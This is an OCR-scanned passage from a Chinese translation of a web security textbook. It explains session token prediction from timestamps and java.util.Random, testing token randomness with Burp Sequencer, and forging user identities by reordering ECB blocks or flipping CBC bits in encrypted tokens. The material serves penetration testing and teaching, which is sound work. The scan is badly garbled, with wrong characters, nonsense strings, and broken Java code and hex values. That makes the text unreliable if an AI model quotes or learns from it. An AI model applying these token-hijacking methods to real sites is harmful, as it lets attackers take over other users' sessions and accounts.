程 中 发 挥 的 作用 。 显 然 ， 在 两 次 截取 令 牌 的 过 程 中 ， 应 用 程序 只 发 布 了 
5 个 令 牌 。 然 而 ， 时 间 已 经 过 去 将 近 10 分 钟 。 最 可 能 的 解释 是 : 令 牌 以 
秒 为 时 间 依 赖 ， 并 可 能 以 窗 秒 计算 。 

确实 ， 预 感 是 正确 的 。 在 随后 的 测试 过 程 中 进行 一 次 代码 审查 ， 可 
发 现 以 下 令 牌 生成 算法 : 

















论 





String sessId = Integer.toString(s_SessionIndex++) + 
” v t 


System.currentTimeMillis({); 


考虑 对 如 何 生 成 令 牌 所 做 的 分 析 ， 攻 击 者 可 以 页 接 构 造 一 个 日 定 义 
攻击 ， 获 得 应 用 程序 癌 其 他 用 尸 发 布 的 会 话 令 牌 。 

口 继续 从 服务 器 中 提取 紧密 相连 的 新 会 话 令 有 牌 。 

口 监控 第 一 个 数字 的 递增 情况 。 如 果 递 增值 大 于 1， 可 知道 应 用 程 
序 向 其 他 用 广发 布 了 二 个 令 和 下 

口 向 其 他 用 户 发 布 一 个 令 牌 时 ， 可 立即 知道 发 布 时 间 的 秒 上 限 和 下 
限 ， 因 为 攻击 者 拥有 在 这 个 令 牌 之 前 和 之 后 发 布 的 令 牌 。 由 于 不 断 获 得 
新 会 话 令 牌 ， 这 些 界 限 之 间 通 利 只 包含 几 百 个 值 。 

口 应 用 程序 每 次 癌 其 他 用 户 发 布 一 个 令 牌 ， 攻 击 者 就 实施 一 次 灾 力 
攻击 遍历 这 个 范围 内 的 每 个 数字 ， 并 把 这 个 数字 附加 到 已 经 发 布 给 其 他 
用 户 的 第 一 个 数字 序列 后 面 。 攻 击 者 答 试 使 用 建立 的 每 个 令 牌 访问 一 个 
受 保护 的 页 面 ， 直 到 党 试 取得 成 功 ， 攻 破 该 用 户 的 会 话 。 

口 继续 运行 这 个 目 定 义 攻 击 即 可 截获 其 他 所 有 应 用 程序 用 户 的 令 
牧 。 一 名 管理 用 户 登录 后 ， 整 个 应 用 程序 将 被 完全 攻破 。 





Al, yn vw) 

笑 试 访问 
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http://mdsec.net/auth/340/ 
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3. 生成 的 数字 随机 性 不 强 

计算 机 中 的 数据 极 少 完全 随机 。 因 此 ， 如 果 由 于 某 种 原因 需要 随机 
数据 ， 一 般 通 过 软件 使 用 各 种 技巧 生成 伪 随 机 数字 。 所 使 用 的 一 些 算法 
生成 看 似 随 机 并 且 在 可 能 的 数值 范围 内 平均 分 布 的 序列 ， 但 有 些 人 只 需 
要 少数 几 个 样本 ， 仍 然 能 够 准确 推导 出 整个 序列 。 

如 果 使 用 一 个 可 预测 的 伪 随 机 数字 发 生 霹 生成 会 话 令 牌 ， 那 么 得 到 
的 令 牌 就 易于 受到 攻击 者 的 攻击 。 

Jetty 是 一 种 完全 以 Java 编 写 的 常用 Web 服 务 占 ， 它 为 在 其 上 运行 的 
应 用 程序 提供 一 种 会 话 管理 机 制 。2006 年 ，NGSSoftware 的 Chris Anley 
发 现 这 种 机 制 易 于 受到 会 话 令 牌 预测 攻击 。 该 服务 器 使 用 Java API 
java.util.Random 生 成 会 话 令 牌 。 它 执行 一 个 “线性 同 余 发 生 堪 ”(〈linear 
congruential generator) ， 通 过 以 下 算法 生成 序列 中 的 下 一 个 数字 : 

synchronized protected int next{int bits) { 
seed = (seed * OxSDEECE66DL + OxBL) & ({1L << 48) - 1); 
return (int) (seed >>> (48 - bits)); 

} 

1 TA, SK boy CEHE oc a PS EE IB, ILE 
一 个 常数 ， 生 成 下 一 个 数字 。 得 到 的 数字 被 截 短 至 48 位 ;然后 ， 算 法 再 
将 结果 进行 转换 ， 返 回 请 求 方 要 求 的 位 数 。 

了 解 了 这 种 算法 和 由 它 生 成 的 一 个 数字 后 ， 就 可 以 轻易 推算 出 接 下 
来 将 要 生成 的 数字 ， 并 且 《 利 用 一 点 数论 知识 ) 推导 出 它 之 前 生成 的 数 
字 。 这 意味 着 攻击 者 只 需 从 服务 器 获得 一 个 会 话 令 牌 ， 就 可 推出 出 所 有 
当前 和 将 来 的 会 话 令 牌 。 
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= 注解 AN, SHIRI “PLB AEF h E 
K AEREE ERG CAE a FI J LS SEE Se HE SE $e FEL OR EBS 
Wo FREUE PRY SE SER TE RA RS 

和 脾 。 但 是 ， 这 种 集 略 通常 是 一 种 误解 。 如 果 攻 击 者 能 够 获得 友 生 器 
生成 的 几 个 连续 输出 ， 他 们 就 可 以 通过 它们 推 采 出 发 生 需 内 部 状态 
的 一 些 信息 ， 因 此 更 容易 同 前 或 同 后 推导 发 生 右 的 输出 顺序 。 


其 他 非 定制 应 用 程序 框架 在 生成 会 话 令 牌 时 使 用 极其 简单 或 可 预测 
MR, FP ye eR ay DAE. PG, PHPHESES.3.2 ASA AS 
基于 客户 端的 耳 地 址 、 生 成 令 牌 时 的 纪元 时 间 、 生 成 令 牌 时 的 微 秒 ， 以 
及 线性 同 余 发 生 器 来 生成 会 话 令 牌 。 虽 然 其 中 有 几 个 未 知 值 ， 但 是 ， 一 
些 应 用 程序 可 以 披露 相关 信息 ， 从 而 推断 出 这 些 值 。 社 交 网 络 站 点 可 能 
会 记录 用 户 的 登录 时 间 和 IP 地 址 。 此 外 ， 该 发 生 器 使 用 的 种 子 是 PHP 进 
程 启动 的 时 间 ， 如 果 攻 击 者 对 服务 器 进行 监视 ， 就 可 以 将 这 个 值 缩 定 在 
一 个 很 小 的 范围 内 。 
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2 一 ”注解 这 是 一 个 不 断 发 展 的 研究 领域 。2001 年 ，Full 
Disclosure 邮 件 列 表 指 出 PHP 会 话 令 牌 年 成 过 程 存在 缺陷 ， 但 并 未 证 
实 该 缺陷 可 被 利用 。2010 年 ，Samy Kamkar 最 终 使 用 phpwn 工 具 实 
现 了 对 这 一 缺陷 的 利用 。 


4. 测试 随机 性 强度 

某 些 时 候 ， 仅 仅 通 过 观察 ， 或 者 通过 适度 的 手动 分 析 ， 就 可 以 确定 
一 系列 令 牌 的 模式 。 但 是 ， 通 稼 而 言 ， 需 要 使 用 更 加 严格 的 方法 来 测试 
应 用 程序 令 牌 的 随机 性 强度 。 

完成 测试 的 标准 方法 是 应 用 统计 假设 测试 原则 ， 并 采用 各 种 严格 的 
测试 查找 令 牌 样本 的 非 随机 性 。 测 试 过 程 的 主要 步骤 如 下 。 

(1) 首先 ， 假 设 令 牌 是 随机 生成 的 。 

(2) 进行 一 系列 测试 ， 通 过 每 个 测试 观察 可 能 具有 某 些 特征 的 令 
牌 样本 (如 果 令 牌 是 随机 生成 的 ) 的 特定 属性 。 

(3) 对 于 每 个 测试 ， 假 定 以 上 假设 是 正确 的 ， 计 算 观 察 到 的 特征 
发 生 的 机 率 。 

(4) 如 果 该 几率 在 某 一 水 平 (显著 性 水 平 ) 之 下 ， 则 和 否定 上 述 假 
设 ， 并 得 出 结论 一 一 令 牌 不 是 随机 生成 的 。 





Aae, IPN LIAR! A, Burp Sequencer 是 
测试 Web 应 用 程序 令 牌 随机 性 的 最 佳 工 具 。 该 工具 可 有 灵活 进行 各 种 标准 
测试 ， 并 为 你 提供 易于 解释 的 明确 结果 。 

要 使 用 Burp Sequencer， 需 要 从 发 布 希 望 进行 测试 的 令 牌 的 应 用 程 
序 中 找到 一 个 啊 应 ， 如 应 用 程序 对 发 布 包含 会 话 令 牌 的 新 cookie 的 登录 
请 求 做 出 的 响应 。 然 后 ， 从 Burp 的 上 下 文 菜单 中 选择 “发 送 至 
sequencer” (send to sequencer) ， 并 在 Sequencer 配 置 中 设置 令 牌 在 啊 应 
中 的 位 置 ， 如 图 7-2 所 示 。 还 可 以 配置 各 种 确定 如 何 收集 令 牌 的 选项 ， 
然后 单 击 “ 开 始 捕 获 ”(start capture) 按钮 ， 开 始 收集 令 胜 。 如 果 已 经 通 
过 其 他 方法 (例如 ， 通 过 保存 某 次 Burp Intruder 攻 击 的 结果 ) 获得 适当 
的 令 牌 样本 ， 则 可 以 使 用 “手动 加 载 ”(manual10ad〉 选项 卡 跳 过 令 牌 收 
集 过 程 ， 直 接 进 入 统计 分 析 阶 段 。 


burp sate professional ioe | 
| rude 








NMios.fimds acne POST /aulty36 VOstaullas'x HTTP. 4Host mdsecnetser-Agent Ma _ | 











图 7-2 ”将 BurpSequencer 配 置 为 测试 会 话 令 牌 的 随机 性 





获得 适当 的 令 牌 样本 后 ， 就 可 以 对 样本 进行 统计 分 析 了 。 还 可 以 在 
收集 样本 的 同时 进行 中 间 分 析 。 一 般 来 次 ， 获 得 更 多 样本 可 提高 分 析 的 
可 靠 性 。Burp 需 要 的 最 小 样本 大 小 为 100 个 令 牌 ， 但 最 好 是 收集 更 多 样 
本 。 如 果 在 分 析 几 百 个 令 牌 后 ， 结 论 表 明令 牌 没 有 通过 随机 性 测试 ， 那 





么 ， 可 以 确定 ， 没 有 必要 再 收集 其 他 令 牌 。 否 则 ， 继 续 收集 令 牌 并 定期 
重新 进行 分 析 。 如 果 收 集 了 5000 个 令 牌 ， 并 且 结 论 表明 这 些 令 牌 通过 了 
随机 性 测试 ， 则 可 以 确定 这 一 数量 已 经 足够 。 但 是 ， 为 符合 正式 的 FIPS 
ENUEN, TRR 05GA, HEB UDC AHA 
小。 

Burp Sequencer 在 字符 和 位 级 别 执行 统计 测试 。 所 有 测试 结果 将 进 
行 汇总 ， 以 对 令 牌 中 的 有 效 焙 的 位 数 〈 这 是 需要 考虑 的 关键 结果 ) 进行 
总 体 评估 。 但 是 ， 还 可 以 深入 分 析 每 项 测试 的 结果 ， 了 解 令 牌 的 不 同 部 
分 如 何以 及 为 何 通过 或 未 通过 每 项 测试 ， 如 图 7-3 所 示 。 用 于 每 类 测试 
的 方法 在 测试 结果 下 面 进行 了 说 明 。 











lv) aulo analyse ‘next 2000) requesis, 1686 


errors: 0 


| summary I characertovel analysis | bilevel analysis | oplions | 
"Prenms mer | FPS ngrrstec! | spectraitests | comeiason | compression | Da conversion | 
summary | FIPS monodi test | FIPS pokortost 








FIPS runs test - significance levels 


190% 4 
10% 
1% 4 
vim 4 


oni 4 


001% | 
<0.0091% 4 
19 20 £0 


x 40 


FPS pass level 





60 


FIPS result 
52 bits passed the iest The folowing 10 dits failed the test 0. 1, 2 3 4, 5, 6, 16, 36, 42. 








Anomalies 
44 anomalies were identified in this test 





number of 2-bit runs ts 100 Small at on O (count 10, probability in a rendem sample: less than 0.9901%) 








图 7-3 ”分 析 BurpSequencer 结 果 以 了 解 所 测试 令 牌 的 属性 


再 要 注意 的 是 ，Burp 会 对 令 牌 中 的 每 个 字符 和 数据 位 单独 进行 所 有 
测试 。 许 多 时 候 ， 你 会 发 现 ， 大 部 分 的 结构 化 令 牌 都 不 是 随机 的 ， 这 本 
号 并 不 表示 存在 任何 类 型 的 缺陷 。 重 要 的 是 ， 令 牌 应 包含 足以 通过 随机 
性 测试 的 位 数 。 例 如 ， 如 果 茶 个 大 令 牌 包含 1000 位 信息 ， 但 其 中 只 有 50 
个 位 通过 了 随机 性 测试 ， 那 么 ， 总 体 而 言 ， 该 令 牌 还 不 如 一 个 完全 通过 
随机 性 测试 的 50 位 令 牌 可 靠 。 
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首先 ， 以 完全 确定 的 方式 生成 的 令 牌 可 能 会 通过 随机 性 统计 测试 。 
例如 ， 线 性 同 余 伪 随 机 数字 发 生 器 ， 或 计算 连续 数字 的 散 列 的 算 
法 ， 可 能 会 生成 通过 测试 的 输出 。 但 是 ， 如 果 攻 击 者 了 解 该 算法 和 
a E E et 


其 次 ， 未 通过 随机 性 统计 测试 的 令 牌 实际 上 也 许 根本 无 法 预 
训 。 如 有 果 令 牌 中 的 特定 数据 位 没有 通过 测试 ， 这 只 古 说 明 在 该 位 置 
观 罕 到 的 数据 位 序列 包含 真正 随机 的 令 牌 中 不 可 能 出 现 的 特征 。 但 
是 ， 如 果 尝 试 根据 观察 到 的 特征 预测 该 数据 位 在 下 一 个 令 牌 中 的 
值 ， 这 样 的 做 法 无 异 于 到 目 猜测 。 八 于 需要 同时 预测 大 量 数据 位 ， 
作出 正确 预测 的 机 率 非 常 低 。 
































渗透 测试 步 又 


(1) 从 第 一 个 应 用 程序 页 面 到 任何 登录 功能 ， 过 历 应 用 程 
序 ， 确 定 其 何 时 以 及 如 何 发 布 会 话 令 牌 。 以 下 两 种 行为 较为 常见 : 

口 只 要 收 到 未 提交 令 牌 的 请 求 ， 应 用 程序 惑 会 创建 新 会 

TH 

口 应 用 程序 在 成 功 登 录 后 创建 新 会 话 。 

要 想 自 动 收 集 大 量 令 牌 ， 最 好 的 办 法 是 确定 一 个 导致 应 用 程序 
发 布 新 令 牌 的 请 求 〈 通 党 为 GET/ 或 登录 请 求 ) 。 

(2) 在 Burp Suite 中 ， 向 Burp Sequencer 发 送 创建 新 会 话 的 请 
求 ， 并 配置 令 牌 的 位 置 。 然 后 启动 实时 捕获 ， 收 集 尽 可 能 多 的 令 
牌 。 如 果 应 用 程序 采用 了 定制 会 话 管理 机 制 ， 则 只 能 远程 访问 该 应 
用 程序 ， 你 可 以 尽 可 能 迅速 地 收集 令 牌 ， 以 尽量 防止 丢失 发 布 给 其 
他 用 户 的 令 牌 ， 并 降低 时 间 依 赖 造成 的 影响 。 

(3) 如 果 应 用 程序 采用 商业 会 话 管理 机 制 并 且 / 或 者 你 可 以 本 
地 访问 该 应 用 程序 ， 则 可 以 在 受 控 条 件 下 获得 无 数 会 话 令 牌 。 

(4) 在 Burp Sequencer 收 集 令 牌 的 同时 ， 启 动 “ 自 动 分 
析 ”(auto analyse) 设置 ， 使 Burp 定 期 自动 执行 统计 分 析 。 至 少 收 
集 500 个 令 牌 ， 然 后 详细 审查 分 析 结 果 。 如 果 令 牌 中 有 足够 的 数据 
位 通过 了 测试 ， 继 续 尽 可 能 长 时 间 地 收集 令 牌 ， 并 在 收集 其 他 令 牌 
时 审查 分 析 结 

(5) 如 果 令 牌 未 通过 随机 性 测试 ， 并 且 似 乎 包含 可 用 于 预测 
将 来 令 脾 的 模式 ， 则 可 以 从 男 一 个 IP 地 址 、 使 用 不 同 的 用 户 名 (如 
RAAR) 重新 开始 收集 令 牌 的 操作 。 这 有 助 于 确定 是 否 能 够 发 现 相 
同 的 模式 ， 以 及 是 否 能 够 根据 前 一 次 操作 获得 的 令 牌 进行 推 新 ， 确 
定 后 一 次 操作 得 到 的 令 脾 。 有 时 候 ， 一 个 用 户 收 集 的 令 牌 序列 表现 
出 某 种 模式 ， 但 因为 来 源 IP 地 址 之 类 的 信息 被 用 作 烂 源 (如 随机 数 
oe HE PP RUSE AS RE HE BT E e A th Fe h 


(6) 如果 攻击 者 认为 已 经 充分 了 解 令 牌 生成 算法 ， 能 够 问 其 
他 用 户 的 会 话 发 动 目 动 攻击 ， 通 过 一 段 定制 脚本 实施 攻击 可 能 是 最 
好 的 方法 ， 因 为 它 能 够 使 用 观测 到 的 特定 模式 生成 令 脾 ， 并 应 用 任 




















何必 需 的 编码 。 请 参阅 第 14 章 了解 在 这 种 情况 下 应 用 某 些 常规 技巧 

“(7) 如 果 可 以 查看 源 代码 ， 则 应 仔细 检查 负责 生成 会 话 令 牌 
的 代码 ， 了 解 它 使 用 的 机 制 ， 并 确定 是 否 可 以 轻易 预测 该 令 牌 。 如 
果 确 定 能 够 对 从 应 用 程序 数据 中 提取 的 灶 实 施 蛮 力 攻击 ， 这 时 需要 
考虑 对 应 用 程序 令 牌 实施 蛮 力 攻击 所 需 的 具体 请 求 数 。 





尝试 访问 


http://mdsec.net/auth/361/ 


7.2.3 JISH 


一 些 应 用 程序 使 用 包含 用 户 有 意义 信息 的 令 牌 ， 并 通过 在 向 用 户 发 
布 令 牌 之 前 对 令 牌 进行 加 密 来 避免 这 种 做 法 导致 的 明显 问题 。 由 于 使 用 
了 用 户 未 知 的 密 钥 对 令 牌 进行 加 密 ， 这 种 方法 似乎 较为 稳 受 ， 因 为 用 户 
无 法 解密 令 牌 并 算 改 其 内 容 。 

但 是 ， 在 某 些 情况 下 ， 根 据 所 采用 的 加 密 算法 以 及 应 用 程序 处 理 令 
牌 的 方式 ， 用 户 甚至 不 需要 解密 令 牌 ， 就 可 以 算 改 令 牌 中 有 意义 的 内 
容 。 这 上 听 起 来 可 能 有 些 匪 夷 所 思 ， 但 实际 上 ， 这 些 攻击 确实 可 行 ， 而 且 
有 时 轻易 就 可 以 实施 ;事实 证 明 ， 现 实 世界 中 的 许多 应 用 程序 都 易于 受 
到 这 种 攻击 。 不 过 ， 这 类 攻击 是 否 可 行 ， 要 取决 于 加 密令 牌 时 所 采用 的 
具体 加 密 算法 。 
1. ECB 密 码 

采用 加 密令 牌 的 应 用 程序 使 用 对 称 加 密 算法 ， 用 于 解密 用 户 返 回 的 
令 牌 ， 恢 复 令 牌 中 有 意义 的 内 容 。 一 些 对 称 加 密 算 法 使 用 “电子 密码 
AS” CECB) 密码 。 这 种 密码 将 明文 划分 成 同等 大 小 的 分 组 (如 每 组 8 个 
字 节 ) ， 然 后 使 用 密 钥 加 密 每 个 分 组 。 在 解密 过 程 中 ， 再 使 用 相同 的 密 
钥 对 每 个 密 文 分 组 进行 解密 ， 将 其 恢复 为 原始 的 明文 分 组 。 这 种 加 密 方 
法 有 一 个 特点 ， 即 如 果 明 文 分 组 存在 某 种 模式 ， 这 可 能 导致 密 文 分 组 也 
存在 一 定 的 模式 ， 因 为 明文 分 组 与 加 密 后 的 密 文 分 组 完全 相同 。 对 于 某 
些 类 型 的 数据 (如 位 图 图 像 〉 而 言 ， 这 意味 着 可 以 从 密 文 判断 明文 中 的 
有 意义 信息 ， 如 图 7-4 所 示 。 









































图 7-4 使 用 ECB 密 码 加 密 的 明文 中 的 模式 可 能 会 在 生成 的 密 文中 可 见 


尽管 ECB 存 在 上 述 缺 点 ， 但 Web 应 用 程序 仍然 经 常 使 用 这 类 密码 来 
加 密 信 息 。 即 使 “明文 模式 ”问题 不 会 出 现 ， 这 种 加 密 方法 仍然 存在 沁 
洞 。 这 主要 是 因为 它 的 明文 分 组 与 密 文 分 组 完全 对 应 所 致 。 

以 下 面 的 应 用 程序 为 例 ， 该 应 用 程序 的 令 牌 包含 儿 个 不 同 的 有 意义 
组 件 ， 包 括 一 个 数字 用 户 标 识 符 : 

rnd=2458992; apn-iTradeEUR_1;uid=218; username da fydd; time-634430423694715 


O00; 
对 这 个 令 牌 进行 加 密 后 ， 它 变 得 没有 任何 意义 ， 并 且 可 能 通过 所 有 标准 
的 随机 性 统计 测试 : 
68BAC980742B9EF80A27CBBECO6G18E3876FF3 DECERGATBSCB8PCA4 EEF IEL1922776F0307 


3291 40AABD223 F003A83 CSDDBEB970C4 7 BAZ £24 9A0670S92D74BCD07D5 LAS ELSOEFC2E69 
885A5C8131E4210F 


ECB 密 码 用 于 加 密 8 字 节 的 分 组 ， 其 明文 分 组 与 对 应 的 密 文 分 组 如 
下 所 示 ; 





rnd=2458 


68BAC980742B9EF8 


992;app= OA27CBBBC0618E38 
iTradeEU 76FF3D6C6E6A7B9C 
R_1;uid= B8FCA486F9E11922 
218;user 776F0307329140AA 
name=daf BD223F003A8309DD 
ydd; time B6B970C47BA2E249 
=6344304 A0670592D74BCD07 
23694715 D51A3E150EFC2E69 
000; 885A5C8131E4210F 


现在 ， 由 于 每 个 蜜 文 分 组 将 始终 解密 成 同一 个 明文 分 组 ， 因 此 ， 攻 
击 者 就 可 以 改变 密 文 分 组 的 顺序 ， 以 条 种 有 意义 的 方式 修改 对 应 的 明文 
分 组 。 根 据 应 用 程序 处 理 生 成 的 加 密令 牌 的 具体 方式 ， 攻 击 者 可 以 通过 
这 种 方法 切换 到 其 他 用 户 ， 或 提升 目 己 的 权限 。 

例如 ， 如 果 将 第 二 个 分 组 复制 到 第 四 个 分 组 之 后 ， 将 得 到 如 下 所 示 
的 分 组 序列 : 


rnd=2458 68BAC980742B9EF8 
992; app= 0A27CBBBC0618E38 
iTradeEU 76FF3D6C6E6A7B9C 
R-1-uid= B8FCA486F9E11922 
992; app= 0A27CBBBC0618E38 
218;user 776F0307329140AA 
name=daf BD223F003A8309DD 
ydd; time B6B970C47BA2 E249 
=6344304 A0670592D74BCD07 
23694715 D51A3E150EPC2E69 
000; 885A5C8131E4210F 


现在 ， 加 密 的 令 牌 中 包含 一 个 经 过 修改 的 uid 值 ， 以 及 一 个 复制 的 
app 值 。 具 体会 出 现 什么 情况 ， 将 取决 于 应 用 程序 如 何 处 理 加 密令 牌 。 
通常 ， 以 这 种 方式 使 用 令 牌 的 应 用 程序 仅 检 查 加 密令 牌 的 某 些 部 分 ， 如 
用 户 标 识 符 。 如 果 应 用 程序 这 样 处 理 令 牌 ， 那 么 ， 应 用 程序 将 处 理 uid 
为 992〈 而 不 是 最 初 的 218) 的 用 户 的 请 求 。 

上 述 攻 击 能 否 奏效 ， 取 决 于 你 在 操纵 分 组 时 ， 应 用 程序 是 否 发 布 一 
个 令 牌 ， 在 其 中 包含 与 有 效 的 uid 值 对 应 的 rnd 值 。 另 一 种 更 加 可 靠 的 攻 
击 方法 ， 是 以 适当 的 偏 移 值 注册 一 个 包含 数值 的 用 户 名 ， 并 复制 该 分 组 
以 蔡 换 现 有 的 uid 值 。 假 设 你 注册 用 户 名 dafl1， 并 且 应 用 程序 发 布 以 下 令 











hi: 


3A5A47BEP9B3B6603708PF9DEAD67C7P4C76PFF3D6C6E6A7B9CB8FCA486PF9E11922A5BC430A 
73B38C14BD223F003&8309DDF29&R5A6EDODC06C53905B5366F5F46B4C0D2BBBBD8BD834BB 
ADEBCO7FFE87319D 


该 令 牌 的 明文 分 组 和 密 文 分 组 如 下 所 示 : 





rnd=9224 9A5A47BF9B3B6603 
856; app= 708F9DERARD67C7F4C 
zTradeEU 76FF3D6C6E6A7B9C 
R_Asuid= BSFCA486F9E11922 
219;user A5BC430A73B38C14 
name=daf BD223F003A82309DD 
1; time=6 F29A5A6FODC06C53 
34430503 905B5366P5F4684C 
61065250 OD2BBBBO8BD834BB 
0; ADEBCO7FFPE87819D 
然后 ， 如 果 将 第 七 个 分 组 复制 到 第 四 个 分 组 之 后 ， 加 密令 脾 将 包含 
uid 值 1: 
rnd=9224 9A5A47BF9B3B6603 
856; app= 7O8F9DEAD67C7F4C 
iTradeEU 76FF3D6C6E6A7B9C 
R_1;uid= BSFCA486F9E11922 
1;time=6 F29A5A6FO0DC06C53 
219;user A5BC430A73B38C14 
name=daf BD223F003A8309DD 
1; time=6 F29ASA6FODC06C53 
34430503 SO5B5366P5P4684C 
61065250 OD2BBBBO8BD834BB 
0; ADEBCO7FFE87819D 


通过 注册 适当 范围 的 用 户 名 并 重新 实施 这 个 攻击 ， 你 就 可 以 循环 使 
用 所 有 有 效 的 uid 值 ， 从 而 伪装 成 每 一 个 应 用 程序 用 户 。 


Al, > BEA D 
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2. CBC# 44 
鉴于 ECB 密 码 存在 明显 的 缺陷 ， 于 是 人 们 开发 出 了 密码 块 链 
(CBC) 密码 。 使 用 CBC 密 码 时 ， 在 加 密 每 个 明文 分 组 之 前 ， 将 它 与 前 
一 个 密 文 分 组 进行 XOR 运 算 ， 如 图 7-5 所 示 。 这 样 ， 同 一 个 明文 分 组 就 
不 会 被 加 密 成 同一 个 密 文 分 组 。 解 密 时 逆向 执行 XOR 运 算 ， 每 个 解密 的 
分 组 将 与 前 一 个 密 文 分 组 进行 XOR 运 算 ， 以 恢复 原始 的 明文 。 
明文 明文 明文 
EEE Eee) CLELCCEGE] LLE CLE) 


初始 化 向 量 i 
CD 一 一 > 


窗 钥 一 >| 分 组 密码 加 密 
































CLLLLLID CEELLELI] OTD 
EX EX 密 文 
图 7-5 “使 用 CBC 密 码 时 ， 在 加 密 每 个 明文 分 组 之 前 ， 将 它 与 前 一 个 密 文 分 组 进行 
XOR 运 算 


由 于 使 用 CBC 密 码 可 以 避免 使 用 ECB 密 码 造 成 的 某 些 问 题 ， 因 此 ， 
CBC 模 式 经 常 使 用 标准 对 称 加 密 算 法 ， 如 DES 和 AES。 但 是 ， 由 于 Web 
应 用 程序 经 常 使 用 CBC 加 密 的 令 牌 ， 这 意味 着 攻击 者 不 需要 了 解密 钥 就 
可 以 操纵 解密 令 牌 的 某 些 部 分 。 

下 面 我 们 对 上 一 个 包含 几 个 不 同 的 有 意义 组 件 〈 包 括 一 个 数字 用 户 
标识 符 ) 的 应 用 程序 令 牌 稍 做 修改 : 


rnd=191432758301; app-eBankProaTc; uid=216; time=6343303; 
和 前 面 一 样 ， 加 密 这 段 信息 后 ， 将 生成 一 个 明显 无 意义 的 令 牌 : 


OFBIF1AFB4C874E695AAFC9RAAd4C2209D3E8E66BBA9B2829B173F255D447C51321586257C 


6E459A93635636F45D/31443163201477 


由 于 这 个 令 牌 是 使 用 CBC 密 码 加 密 的 ， 因 此 ， 在 解密 该 令 牌 时 ， 将 


对 每 个 密 文 分 组 与 下 一 个 解密 的 文本 块 进行 XOR 运 算 ， 以 获得 明文 。 现 
在 ， 如 果 攻 击 者 修改 密 文 〈 他 收 到 的 令 牌 ) 的 某 些 部 分 ， 将 导致 特定 的 
分 组 被 解密 成 乱码 。 但 是 ， 这 也 导致 下 一 个 解密 的 文本 块 将 与 不 同 的 值 
进行 XOR 运 算 ， 从 而 生成 经 过 修改 但 仍 有 意义 的 明文 。 换 言 之 ， 通 过 操 
纵 令 牌 中 的 茶 个 分 组 ， 攻 击 者 能 够 修改 它 之 后 的 分 组 的 解密 内 容 。 如 果 
应 用 程序 以 危险 的 方式 处 理 生成 的 解密 令 牌 ， 攻 击 者 将 能 够 切换 到 其 他 
用 户 或 提升 自己 的 权限 。 

为 什么 会 出 现 这 种 情况 呢 ? 在 上 述 示例 中 ， 攻 击 者 对 加 密 的 令 牌 进 
行 修改 ， 每 次 以 任意 方式 更 改 一 个 字符 ， 并 将 修改 后 的 令 牌 友 送 给 应 用 
程序 。 在 这 个 过 程 中 ， 攻 击 者 会 提出 大 量 请 求 。 应 用 程序 对 每 个 修改 后 
的 令 脾 进行 解密 后 生成 的 部 分 值 如 下 所 示 : 

227277?727732858301; app=eBankProdTC; uid=216; time=6343303; 

27722?72727732758321; app=eBankProdTC; uid=216; time=6343303; 

rnd=1914????????; aqp-eBankProdTC; uid=216; time=6343303; 

rnd=19147??7?7?7???;app-eAankProdTC; uid=216; time=6343303; 
rnd=191432758301?7???22?7??nkPqodTC; uid=216; time=6343303; 
rnd=191432758301272272?7? ?nkProdUc; uid=216; time=6343303; 


rnd=191432758301; app=eBa7?7777777;uie=216; time=6343303; 











rnd=191432758301; app=eBa??????7??;uid=226; time=6343303; 


rnd=191432758301; app=eBankProdTC??????7?7?7; tim@=6343303; 


文本 ， 只 是 与 原始 令 牌 略 有 不 同 。 如 前 所 述 ， 出 现 这 种 不 同 ， 是 因为 解 
密 的 文本 与 前 一 个 密 文 分 组 进行 了 XOR 运 算 ， 而 攻击 者 已 对 该 密 文 分 组 
进行 了 略微 修改 。 

虽然 攻击 者 看 不 到 解密 的 值 ， 但 应 用 程序 会 尝试 处 理 这 些 值 ， 随 后 
攻击 者 会 在 应 用 程序 的 啊 应 中 看 到 处 理 结果 。 有 具体 来 说 ， 接 下 来 会 出 现 
什么 情况 ， 取 决 于 应 用 程序 如 何 处 理 经 过 修改 的 解密 令 牌 。 如 果 应 用 程 
序 拒绝 包含 任何 无 效 数 据 的 令 牌 ， 攻 击 将 会 失败 。 但 是 ， 以 这 种 方式 使 
用 令 牌 的 应 用 程序 通常 仅 查 看 解密 令 牌 的 某 些 部 分 ， 如 用 户 标识 符 。 如 
果 应 用 程序 这 样 处 理 令 牌 ， 那 么 ， 上 面 列表 中 的 第 八 个 分 组 将 能 够 成 功 
实施 攻击 ， 应 用 程序 将 处 理 攻 击 者 提出 的 请 求 ， 并 认为 用 户 的 uid 为 
226， 而 不 是 最 初 的 216。 

(EH Burp Intrude 冲 的 “位 翻转 程序 ”(bit flipper) 有效 载 集 类 型 ， 可 
以 轻松 测试 出 应 用 程序 是 否 存在 这 方面 的 漏洞 。 首 先 ， 需 要 使 用 你 上 自己 
的 账户 登录 应 用 程序 。 然 后 ， 找 到 一 个 使 用 已 登录 会 话 并 在 啊 应 中 显示 


























己 登 录用 户 标 识 符 的 应 用 程序 页 面 ， 通 常 是 用 户 的 “ 主 登录 ”页 或 “账户 
详细 资料 ”页 。 图 7-6 显 示 了 如 何 将 Burp Intruder 设 置 为 针对 用 户 的 主 
页 ， 其 中 的 加 密会 话 令 牌 被 标记 为 有 效 载荷 位 置 。 
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图 7-6 Burp Intruder 配 置 为 修改 加 密会 话 令 牌 


所 需 的 有 效 载荷 配置 如 图 7-7 所 示 。 它 指示 Burp 处 理 令 牌 的 原始 
值 ， 将 其 视 为 ASCII 编 码 的 十 六 进 制 代 码 ， 并 “翻转 ”每 个 字符 位 置 的 每 
个 数据 位 。 这 种 方法 非常 理想 ， 因 为 只 需要 提交 较 小 数量 的 请 求 〈 令 牌 
中 的 每 个 字 市 8 个 请 求 ) ， 并 且 几 乎 总 是 能 够 确定 应 用 程序 是 否 易于 受 
~ XEMA ARKH EAE PER Be, XEHE A vlad AA] 
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Al7-7 ”将 Burp Intruder 配 置 为 “翻转 ?加 密令 牌 中 的 每 个 位 





实施 攻击 时 ， 最 初 的 请 求 并 不 会 导致 应 用 程序 的 啊 应 产生 任何 明 旺 
的 变化 ， 用 户 的 会 话 也 未 遭 到 修改 。 这 本 身 就 值得 我 们 注意 ， 因 为 这 表 
示 令 牌 的 第 一 部 分 并 未 用 于 确定 登录 用 户 。 攻 击 过 程 中 随后 提交 的 许多 
请 求 导 致 应 用 程序 重 定 癌 到 登录 页 面 ， 这 说 明 所 做 的 修改 已 导致 令 牌 失 
效 。 关 键 在 于 ， 还 存在 一 些 请 求 ， 其 啊 应 似乎 是 有 效 会 话 的 一 部 分 ， 但 
